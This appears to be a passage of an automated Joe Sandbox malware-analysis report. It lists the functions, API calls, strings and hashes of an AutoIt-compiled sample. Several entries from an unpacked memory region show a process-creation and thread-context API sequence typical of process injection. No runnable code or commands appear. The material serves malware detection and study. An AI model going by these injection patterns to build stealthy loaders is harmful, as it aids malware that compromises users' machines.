TaskbarCreated, xrefs: 00443725
%M, xrefs: 0047D081, 0047D0CF

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
String ID: TaskbarCreated$%M
API String ID: 129472671-1079050267
Opcode ID: 484da29db6af1e0d7638e5f38219072426f2474f639f5ae59f53aeda64b15627
Instruction ID: fba8becf9c784fc2661eacc013f22af12ed97b57fc8af09bfa046a0e9c487130
Opcode Fuzzy Hash: 484da29db6af1e0d7638e5f38219072426f2474f639f5ae59f53aeda64b15627
Instruction Fuzzy Hash: B54119B1200506ABEF245F64DC09BBF3695EF10B02F54412BF902963E2DA6C5D49AA6E

Function 00443A46 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00443A50
LoadCursorW.USER32(00000000,00007F00), ref: 00443A5F
LoadIconW.USER32(00000063), ref: 00443A76
LoadIconW.USER32(000000A4), ref: 00443A88
LoadIconW.USER32(000000A2), ref: 00443A9A
LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00443AC0
RegisterClassExW.USER32(?), ref: 00443B16

Part of subcall function 00443041: GetSysColorBrush.USER32(0000000F), ref: 00443074
Part of subcall function 00443041: RegisterClassExW.USER32(00000030), ref: 0044309E
Part of subcall function 00443041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004430AF
Part of subcall function 00443041: InitCommonControlsEx.COMCTL32(?), ref: 004430CC
Part of subcall function 00443041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 004430DC
Part of subcall function 00443041: LoadIconW.USER32(000000A9), ref: 004430F2
Part of subcall function 00443041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00443101

Strings

AutoIt v3, xrefs: 00443B05
#, xrefs: 00443AFB
0, xrefs: 00443AF4

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
String ID: #$0$AutoIt v3
API String ID: 423443420-4155596026
Opcode ID: b8f120401f252885cb35d5d5ab18cfb8c9a432e9d78a097dafacd67efa09133c
Instruction ID: c18fb30c89574f40adefda4a5b59c890e4e3d29d1c3a9d9b29b9244b9b9b5df9
Opcode Fuzzy Hash: b8f120401f252885cb35d5d5ab18cfb8c9a432e9d78a097dafacd67efa09133c
Instruction Fuzzy Hash: 39214D74D01309EFEF10DFA4ED49B9E7FB1FB18711F00412AE504A62A1E3B95558AF98

Function 00443766 Relevance: 16.0, APIs: 1, Strings: 8, Instructions: 267
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

/ErrorStdOut, xrefs: 0044387D
/AutoIt3OutputDebug, xrefs: 00443892
CMDLINE, xrefs: 00443822
CMDLINERAW, xrefs: 004437FB
RP, xrefs: 0047D213
>>>AUTOIT NO CMDEXECUTE<<<, xrefs: 004437AE
/AutoIt3ExecuteLine, xrefs: 004438A7
/AutoIt3ExecuteScript, xrefs: 004438BC

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW$RP
API String ID: 1825951767-4273434232
Opcode ID: 93011fc23edde60745e66b2ead85166bfd893e901b3703a95168ad50bb4b9a18
Instruction ID: c32b1bee2ec0c58644cdaa48765072ec2e75f6e14d9cccb9561e7d21eeb2492b
Opcode Fuzzy Hash: 93011fc23edde60745e66b2ead85166bfd893e901b3703a95168ad50bb4b9a18
Instruction Fuzzy Hash: B1A17C75910219AAEF04EFA1DC81AEFB779BF14704F50042FF415A2192EF786A09CB68

Function 0044F76F Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 168
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00460162: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00460193
Part of subcall function 00460162: MapVirtualKeyW.USER32(00000010,00000000), ref: 0046019B
Part of subcall function 00460162: MapVirtualKeyW.USER32(000000A0,00000000), ref: 004601A6
Part of subcall function 00460162: MapVirtualKeyW.USER32(000000A1,00000000), ref: 004601B1
Part of subcall function 00460162: MapVirtualKeyW.USER32(00000011,00000000), ref: 004601B9
Part of subcall function 00460162: MapVirtualKeyW.USER32(00000012,00000000), ref: 004601C1

Part of subcall function 004560F9: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,0044F930), ref: 00456154

GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0044F9CD
OleInitialize.OLE32(00000000), ref: 0044FA4A
CloseHandle.KERNEL32(00000000), ref: 004845C8

Strings

<WP, xrefs: 0044F930
\TP, xrefs: 0044F7F7
%M, xrefs: 0044F796, 0044F7A8, 0044F96E, 0044FA51
SP, xrefs: 0044F7EB

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
String ID: <WP$\TP$%M$SP
API String ID: 1986988660-3068789897
Opcode ID: 72a2d8430c383655c1123e057b06bb1b66488c0ddfbb77279267cb26e7a6c4ea
Instruction ID: 2bf4d344b047746df3fea2df5f5993cc74edee4d14ce8dae23080341ca003a2e
Opcode Fuzzy Hash: 72a2d8430c383655c1123e057b06bb1b66488c0ddfbb77279267cb26e7a6c4ea
Instruction Fuzzy Hash: E581CFB0901A408EDB84DF3AA98569F7BE5FB68346794852FD408C7372F774088DAF19

Function 00B07AF8 Relevance: 10.7, APIs: 7, Instructions: 239
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 00B07BC9
VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00B07DEF

Memory Dump Source

Source File: 00000000.00000002.1517936624.0000000000B05000.00000040.00000020.00020000.00000000.sdmp, Offset: 00B05000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b05000_AxKxwW9WGa.jbxd

Similarity

API ID: CreateFileFreeVirtual
String ID:
API String ID: 204039940-0
Opcode ID: e3e00bf9dbafeb2e33b0b1731302cb2fbf5584eb46f22b1b855d3d8c7a9348fe
Instruction ID: 4cea80f48b36769dbfec10f1900dd924ee09821d92952d95b626c6153b5d5476
Opcode Fuzzy Hash: e3e00bf9dbafeb2e33b0b1731302cb2fbf5584eb46f22b1b855d3d8c7a9348fe
Instruction Fuzzy Hash: FDA1FA74E44209EBDB14CFA4C895BAEFBB5FF48304F2085A9E511BB2C0DB75AA41CB54

Function 004439D5 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00443A03
CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00443A24
ShowWindow.USER32(00000000,?,?), ref: 00443A38
ShowWindow.USER32(00000000,?,?), ref: 00443A41

Strings

AutoIt v3, xrefs: 004439FB, 00443A00, 00443A01
edit, xrefs: 00443A1E

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: Window$CreateShow
String ID: AutoIt v3$edit
API String ID: 1584632944-3779509399
Opcode ID: e4d1c6d66a6ac02cc1f89513b21cd812902e392a419abae7611bf80670cc97c9
Instruction ID: a6a15c8ebdb4232b3acb33ba041565dc6dbab5d4bea79da2d7425eff9e8e887b
Opcode Fuzzy Hash: e4d1c6d66a6ac02cc1f89513b21cd812902e392a419abae7611bf80670cc97c9
Instruction Fuzzy Hash: 6BF03A78501295BFEA7057236C0CF3B2E7EDBD6F50B00402EB904A2170D2790818EEB4

Function 00B07898 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 155
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00B07788: Sleep.KERNELBASE(000001F4), ref: 00B07799

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00B079E4

Strings

DS8YS8A1GWX7RM8B7D23I8AT3T2GA, xrefs: 00B07A47, 00B07A4A

Memory Dump Source

Source File: 00000000.00000002.1517936624.0000000000B05000.00000040.00000020.00020000.00000000.sdmp, Offset: 00B05000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b05000_AxKxwW9WGa.jbxd

Similarity

API ID: CreateFileSleep
String ID: DS8YS8A1GWX7RM8B7D23I8AT3T2GA
API String ID: 2694422964-700911155
Opcode ID: 8d443ac02fa77bfda3a66b182fdc5ea65153ad6b8a1f21233f26a3d36b0e05be
Instruction ID: a0a563c33d8a50eedd296d8763d71d63f0cd8b6784ee147493e1a637b3138732
Opcode Fuzzy Hash: 8d443ac02fa77bfda3a66b182fdc5ea65153ad6b8a1f21233f26a3d36b0e05be
Instruction Fuzzy Hash: 3D614030D48288DAEF11D7B4C849BDEBFB9AF15304F044199E6487B2C1D7B91B49CB65

Function 0044407C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 0047D3D7

Part of subcall function 00447BCC: _memmove.LIBCMT ref: 00447C06

_memset.LIBCMT ref: 004440FC
_wcscpy.LIBCMT ref: 00444150
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00444160

Strings

Line: , xrefs: 0047D400

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
String ID: Line:
API String ID: 3942752672-1585850449
Opcode ID: 14fd7dee06b2ff56b84797265a7f83778c3337b541d0da8c8e961e744ac22eac
Instruction ID: 757a5b9c03377622c894729121611c27307b1d27f5c03ea464bd6ae166109391
Opcode Fuzzy Hash: 14fd7dee06b2ff56b84797265a7f83778c3337b541d0da8c8e961e744ac22eac
Instruction Fuzzy Hash: 2F31C171008705ABE720EB60DC4AFDF77D8AF50308F10451FF68592191EB78A649CB9B

Function 0044686A Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 260COMMON

Download Yara Rule

APIs

Part of subcall function 00444DDD: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,005052F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00444E0F

_free.LIBCMT ref: 0047E263
_free.LIBCMT ref: 0047E2AA

Part of subcall function 00446A8C: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00446BAD

Strings

>>>AUTOIT SCRIPT<<<, xrefs: 0047E039
Bad directive syntax error, xrefs: 0047E292

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: _free$CurrentDirectoryLibraryLoad
String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
API String ID: 2861923089-1757145024
Opcode ID: 0abf9a423df323aaef02539a34719db8f67fdbeaf8977e10619e894a7665e9f6
Instruction ID: a2cd8bee24defcde4cd676ad762dfb559031aa5774364227c68e7389ae1d17aa
Opcode Fuzzy Hash: 0abf9a423df323aaef02539a34719db8f67fdbeaf8977e10619e894a7665e9f6
Instruction Fuzzy Hash: 0891A2719002199FCF04EFA6CC419EEB7B4FF09314B10856FF815AB2A1DB789905CB58

Function 004435B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,004435A1,SwapMouseButtons,00000004,?), ref: 004435D4
RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,004435A1,SwapMouseButtons,00000004,?,?,?,?,00442754), ref: 004435F5
RegCloseKey.KERNELBASE(00000000,?,?,004435A1,SwapMouseButtons,00000004,?,?,?,?,00442754), ref: 00443617

Strings

Control Panel\Mouse, xrefs: 004435D2

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Control Panel\Mouse
API String ID: 3677997916-824357125
Opcode ID: ee7043179bf1d150cff4559d9613ea097096fd981e96889042adfcd47585ebf5
Instruction ID: 86e49b99d0a37508ac568578b5fe0ed9cbe708eec3bef8fd422f8ce877fc5cdf
Opcode Fuzzy Hash: ee7043179bf1d150cff4559d9613ea097096fd981e96889042adfcd47585ebf5
Instruction Fuzzy Hash: C0114875510209BFEB20DF65DC40DAFB7B9EF04B41F12846AE805D7210D2759E449768

Function 00B06788 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 00B06F43
Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00B06FD9
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00B06FFB

Memory Dump Source

Source File: 00000000.00000002.1517936624.0000000000B05000.00000040.00000020.00020000.00000000.sdmp, Offset: 00B05000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b05000_AxKxwW9WGa.jbxd

Similarity

API ID: Process$ContextCreateMemoryReadThreadWow64
String ID:
API String ID: 2438371351-0
Opcode ID: 75058a4f97cf2fcbd3f6bc15a6ffc08ef8895de4d25848071cc819695d886454
Instruction ID: 2c3d142f610892f7227299c893a9c9f8706198ff64597506e1295d774c649f11
Opcode Fuzzy Hash: 75058a4f97cf2fcbd3f6bc15a6ffc08ef8895de4d25848071cc819695d886454
Instruction Fuzzy Hash: 4E62FA30A14658DBEB24CBA4C850BDEB776FF58300F1091A9E10DEB2D4EB759E81CB59

Function 004A955B Relevance: 6.2, APIs: 4, Instructions: 155COMMON

Download Yara Rule

APIs

Part of subcall function 00444EE5: _fseek.LIBCMT ref: 00444EFD

Part of subcall function 004A9734: _wcscmp.LIBCMT ref: 004A9824
Part of subcall function 004A9734: _wcscmp.LIBCMT ref: 004A9837

_free.LIBCMT ref: 004A96A2
_free.LIBCMT ref: 004A96A9
_free.LIBCMT ref: 004A9714

Part of subcall function 00462D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00469A24), ref: 00462D69
Part of subcall function 00462D55: GetLastError.KERNEL32(00000000,?,00469A24), ref: 00462D7B

_free.LIBCMT ref: 004A971C

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
String ID:
API String ID: 1552873950-0
Opcode ID: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
Instruction ID: 0c54e31bb4f0325504545ea474d4c59431f1baefd27e41debb0350f2e3f5906e
Opcode Fuzzy Hash: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
Instruction Fuzzy Hash: B0515CB1D04218ABDF249F65CC81A9EBBB9EF48304F1004AEF209A7241DB755E80CF59

Function 0046470A Relevance: 6.1, APIs: 4, Instructions: 136COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 004647A0
__flush.LIBCMT ref: 004647C0
__write.LIBCMT ref: 004647F3
__flsbuf.LIBCMT ref: 00464821

Part of subcall function 00468B28: __getptd_noexit.LIBCMT ref: 00468B28

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: __flsbuf__flush__getptd_noexit__write_memmove
String ID:
API String ID: 2782032738-0
Opcode ID: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
Instruction ID: bb7fa2089a67cebd1d700eaf385efc40816826f07a6425f33a92f92eb23287cc
Opcode Fuzzy Hash: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
Instruction Fuzzy Hash: E641D674B007459BDF189E69C88096F7BA5AFC2365B14813FE415C7740F778DD418B4A

Function 004444A0 Relevance: 6.1, APIs: 4, Instructions: 66timewindowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 004444CF

Part of subcall function 0044407C: _memset.LIBCMT ref: 004440FC
Part of subcall function 0044407C: _wcscpy.LIBCMT ref: 00444150
Part of subcall function 0044407C: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00444160

KillTimer.USER32(?,00000001,?,?), ref: 00444524
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00444533
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 0047D4B9

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
String ID:
API String ID: 1378193009-0
Opcode ID: 21ee01adb92dccdd8411138ff88a1eacc1c30d698fec4a8e8659ecc7e2298819
Instruction ID: 51e8f62d71ebe4aaa3b0ba130dd5fa9cf41e72f661827a53c98df19e0ec05dd8
Opcode Fuzzy Hash: 21ee01adb92dccdd8411138ff88a1eacc1c30d698fec4a8e8659ecc7e2298819
Instruction Fuzzy Hash: BC21D374904794AFEB328B24D845BE7BBECAF41318F04409EE78E56241C37829888B4A

Function 00444C70 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 141COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00444CBA

Strings

EA06, xrefs: 0047D8CC
AU3!P/M, xrefs: 00444CB4

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: _memmove
String ID: AU3!P/M$EA06
API String ID: 4104443479-3918406938
Opcode ID: 606dc41aa9c8a900fa777e83625bb50ae457883414c1720430cd7278b7c3bc4f
Instruction ID: e1f9f1bd262d4fb215b1ace5a6cd8ae25a58fa8fb38321c3810d060be84f1690
Opcode Fuzzy Hash: 606dc41aa9c8a900fa777e83625bb50ae457883414c1720430cd7278b7c3bc4f
Instruction Fuzzy Hash: C8417DA1E0415857FF219B54C8917BF7FA1EFC5304F28446BEC829B386D62C4D4583AA

Function 00447285 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0047EA39
GetOpenFileNameW.COMDLG32(?), ref: 0047EA83

Part of subcall function 00444750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00444743,?,?,004437AE,?), ref: 00444770

Part of subcall function 00460791: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 004607B0

Strings

X, xrefs: 0047EA51

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: Name$Path$FileFullLongOpen_memset
String ID: X
API String ID: 3777226403-3081909835
Opcode ID: 2cf3b704d0c97e729733d25772b3496369a850d7874f6f0f82e9c4fb8c0b86e2
Instruction ID: 257228d3ad7953a761580c4d783da067a8b46041b7974035c26af79b7f468dbb
Opcode Fuzzy Hash: 2cf3b704d0c97e729733d25772b3496369a850d7874f6f0f82e9c4fb8c0b86e2
Instruction Fuzzy Hash: 8E21C670A002489BDF419F95D845BEF7BF8AF49714F00805FE508AB241DBFC59498F96

Function 004A98E3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?), ref: 004A98F8
GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 004A990F

Strings

aut, xrefs: 004A9909

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: Temp$FileNamePath
String ID: aut
API String ID: 3285503233-3010740371
Opcode ID: 3802118461eb06d09feaa2eac73becde4473b796843eddeef4e9b84dc4ab01be
Instruction ID: 53b9b18d3e9bb8ed20ed46890223f332ceaee9201bb8201f7b481e66b3e4a46c
